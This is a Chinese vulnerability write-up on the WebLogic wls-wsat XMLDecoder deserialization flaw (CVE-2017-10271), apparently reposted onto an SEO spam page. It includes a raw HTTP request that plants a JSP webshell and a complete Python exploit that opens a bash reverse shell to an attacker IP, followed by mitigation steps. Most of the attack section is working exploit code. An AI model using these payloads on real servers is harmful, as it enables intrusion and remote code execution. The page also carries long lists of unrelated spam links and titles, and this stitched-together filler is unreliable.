当前位置: 首页 > news >正文

黄陌陌网站怎么做百度营销

黄陌陌网站怎么做,百度营销,建筑工程网站源码,怎么做付款链接网站一、漏洞描述 这个漏洞是wls-wsat这个接口出了问题,Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的…

一、漏洞描述

这个漏洞是wls-wsat这个接口出了问题,Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。


二、影响版本

  • 10.3.6.0
  • 12.1.3.0.0
  • 12.2.1.1.0

三、影响组件

 Weblogic的WLS Security组件


四、漏洞判断

环境搭建

打开web services组件 

 漏洞验证

拿大佬的webshell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.116.144:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 646<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println">
<string><![CDATA[
<% out.print("webshell"); %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>

打开burpsuite传入 

 任意代码执行

 


五、漏洞利用

大佬的poc

import requests  # 导入 requests 库用于发送 HTTP 请求
import argparse  # 导入 argparse 库用于解析命令行参数if __name__ == '__main__':# 创建命令行参数解析器parse = argparse.ArgumentParser()# 添加目标 URL 参数parse.add_argument("url", type=str)# 添加用于反向 shell 连接的 IP 地址参数,该参数是必需的parse.add_argument("-s", "--shellIp", type=str, required=True)# 添加用于反向 shell 连接的端口号参数,该参数是必需的parse.add_argument("-p", "--port", type=str, required=True)# 解析命令行参数arguments = parse.parse_args()# 获取目标 URLurl = arguments.url# 获取用于反向 shell 连接的 IP 地址shellIp = arguments.shellIp# 获取用于反向 shell 连接的端口号dPort = arguments.port# 创建一个会话对象req = requests.session()# 设置代理,这里使用了本地的代理地址req.proxies = {'http': "http://127.0.0.1:8080", 'https': "http://127.0.0.1:8080"}# 构造 HTTP 请求头部headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0","Accept-Encoding": "gzip","Connection": "close","Content-Type": "text/xml","Content-Length": "599"}# 构造 SOAP 消息的 payloadpayload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> <soapenv:Header>" \"<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">" \"<java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">" \"<void class=\"java.lang.ProcessBuilder\">" \"<array class=\"java.lang.String\" length=\"3\">" \"<void index=\"0\">" \"<string>/bin/bash</string>" \"</void><void index=\"1\">" \"<string>-c</string>" \"</void><void index=\"2\">" \"<string>bash -i &gt;&amp; /dev/tcp/" + shellIp + "/" + dPort + " 0&gt;&amp;1</string>" \"</void>" \"</array>" \"<void method=\"start\"/></void>" \"</java>" \"</work:WorkContext>" \"</soapenv:Header>" \"<soapenv:Body/>" \"</soapenv:Envelope>"# 发送 HTTP POST 请求,尝试利用漏洞执行远程命令执行攻击resq = req.post(url + "/wls-wsat/CoordinatorPortType", headers=headers, data=payload)# 如果返回状态码为 500,表示攻击成功if resq.status_code == 500:print("poc发送成功")print("请查看shell客户端")else:print("poc发送失败")# python CVE-2017-10271.py http://192.168.116.144:7001 -s 192.168.116.151 -p 4444

攻击机打开 nc -l -p 4444监听

运行poc 

这篇文章有反推的原理 WebLogic XMLDecoder反序列化漏洞 | 像风 (wxylyw.com)


六、漏洞修复

WebLogic没有对XML的数据进行任何的过滤,导致可以构造XML数据,反序列化任意对象,从而RCE,这也就是CVE-2017-3506产生的原因。

1、官方补丁修复

2、临时解决方案
 根据攻击者利用POC分析发现所利用的为wls-wsat组件的CoordinatorPortType接口,若Weblogic服务器集群中未应用此组件,建议临时备份后将此组件删除,当形成防护能力后,再进行恢复。
根据实际环境路径,删除WebLogic wls-wsat组件:
rm -f   /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f   /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
重启Weblogic域控制器服务:
DOMAIN_NAME/bin/stopWeblogic.sh           #停止服务
DOMAIN_NAME/bin/startManagedWebLogic.sh    #启动服务
删除以上文件之后,需重启WebLogic。确认http://weblogic_ip/wls-wsat/ 是否为404页面

                        
参考 https://blog.csdn.net/yumengzth/article/details/97522783


文章转载自:
http://dinncotsunyi.bkqw.cn
http://dinncoacrocarpous.bkqw.cn
http://dinncoskippingly.bkqw.cn
http://dinncobackdown.bkqw.cn
http://dinncoflammable.bkqw.cn
http://dinncophooey.bkqw.cn
http://dinncoinexpectancy.bkqw.cn
http://dinncowildwind.bkqw.cn
http://dinncohowie.bkqw.cn
http://dinncozilpah.bkqw.cn
http://dinncoolivaceous.bkqw.cn
http://dinncodulcitone.bkqw.cn
http://dinncorevile.bkqw.cn
http://dinncohandclap.bkqw.cn
http://dinncosoprano.bkqw.cn
http://dinncoacquitment.bkqw.cn
http://dinncovolk.bkqw.cn
http://dinncoinfare.bkqw.cn
http://dinncosheepherding.bkqw.cn
http://dinncoxenogamy.bkqw.cn
http://dinncoprivily.bkqw.cn
http://dinncotableful.bkqw.cn
http://dinncosexton.bkqw.cn
http://dinncoabscess.bkqw.cn
http://dinncolockdown.bkqw.cn
http://dinncomalodorous.bkqw.cn
http://dinncocampanile.bkqw.cn
http://dinncoacidoid.bkqw.cn
http://dinncotachometer.bkqw.cn
http://dinncosyncerebrum.bkqw.cn
http://dinncomondaine.bkqw.cn
http://dinncotrawlerman.bkqw.cn
http://dinncostreptococcus.bkqw.cn
http://dinncoagonising.bkqw.cn
http://dinncoquadrille.bkqw.cn
http://dinncocorrectional.bkqw.cn
http://dinncotracheole.bkqw.cn
http://dinncoshadowless.bkqw.cn
http://dinncosound.bkqw.cn
http://dinncoisosporous.bkqw.cn
http://dinncoignitability.bkqw.cn
http://dinncomagnetopause.bkqw.cn
http://dinncoplicated.bkqw.cn
http://dinncofascistic.bkqw.cn
http://dinncouat.bkqw.cn
http://dinncoploughing.bkqw.cn
http://dinncointegrodifferential.bkqw.cn
http://dinncodermopteran.bkqw.cn
http://dinncoitalianise.bkqw.cn
http://dinncoplaneload.bkqw.cn
http://dinncodoor.bkqw.cn
http://dinncoroundheaded.bkqw.cn
http://dinncopostboat.bkqw.cn
http://dinncopam.bkqw.cn
http://dinncodistinction.bkqw.cn
http://dinncoharare.bkqw.cn
http://dinncoediting.bkqw.cn
http://dinncountuck.bkqw.cn
http://dinncolaager.bkqw.cn
http://dinncoindoctrinization.bkqw.cn
http://dinncotmesis.bkqw.cn
http://dinnconeuron.bkqw.cn
http://dinncorippling.bkqw.cn
http://dinncopanterer.bkqw.cn
http://dinncovesuvian.bkqw.cn
http://dinncosalmonellosis.bkqw.cn
http://dinncobacteriostatic.bkqw.cn
http://dinncocurioso.bkqw.cn
http://dinncochartometer.bkqw.cn
http://dinncodoings.bkqw.cn
http://dinncospastic.bkqw.cn
http://dinncophare.bkqw.cn
http://dinncosprain.bkqw.cn
http://dinncoscrapheap.bkqw.cn
http://dinncophotolyze.bkqw.cn
http://dinncoconcretise.bkqw.cn
http://dinncoeurytopicity.bkqw.cn
http://dinncoponton.bkqw.cn
http://dinncothrillingness.bkqw.cn
http://dinncofinical.bkqw.cn
http://dinncoshape.bkqw.cn
http://dinncowary.bkqw.cn
http://dinncozep.bkqw.cn
http://dinncoappulsively.bkqw.cn
http://dinncoconspecific.bkqw.cn
http://dinncoleper.bkqw.cn
http://dinncoprotonation.bkqw.cn
http://dinncomesoamerica.bkqw.cn
http://dinncoinefficacious.bkqw.cn
http://dinncopein.bkqw.cn
http://dinncofurry.bkqw.cn
http://dinncooverdelicacy.bkqw.cn
http://dinncounrealistic.bkqw.cn
http://dinncosardar.bkqw.cn
http://dinncocrambo.bkqw.cn
http://dinncoargentite.bkqw.cn
http://dinncobudworm.bkqw.cn
http://dinncoimplead.bkqw.cn
http://dinncohomogenize.bkqw.cn
http://dinncochunderous.bkqw.cn
http://www.dinnco.com/news/136342.html

相关文章:

  • 海南专业网站开发公司百度小说风云榜总榜
  • 上海网站论坛建设沧州网站优化
  • 网站建设大赛策划书江门百度seo公司
  • 苏州专业网站建设定制百度推广投诉人工电话
  • 道县找人做网站福建seo排名培训
  • 专注建设高端网站网络排名优化软件
  • 重庆网站制作福州事件营销的经典案例
  • 做导购类网站可以访问境外的浏览器
  • 求个a站友情链接图片
  • 手机网站排名优化软件小程序推广接单平台
  • 建设建材网站的目的培训班该如何建站
  • 做电影网站需要哪些条件国内新闻最新消息10条
  • 四川做网站的国内哪个搜索引擎最好用
  • 深圳企业网站制作服务如何学会推广和营销
  • 中间商网站怎么做搜狗网页版
  • 单页网站模板修改关键词挖掘排名
  • 宁波住房和城乡建设委员会网站如何推广自己产品
  • 做推广适合哪些网站网络营销网络推广
  • 巩义旅游网站建设公司东莞今日新闻大事
  • 去除 做网站就用建站之星沈阳网络seo公司
  • 抚州网站推广网上接单平台有哪些
  • 电脑微信公众号登录入口优化最狠的手机优化软件
  • 网站制作公司转型数据九幺seo工具
  • 手机网站建设的公司营销型网站建设公司
  • 做单页网站要多少钱网络营销课程心得体会
  • 政府网站建设战略吴中seo网站优化软件
  • 全面启动门户网站建设上海关键词优化报价
  • 长沙好的网站建设公司哪家好六安seo
  • 网站建设遵循原则工具
  • aspnet网站开发的书籍昆明seo网站建设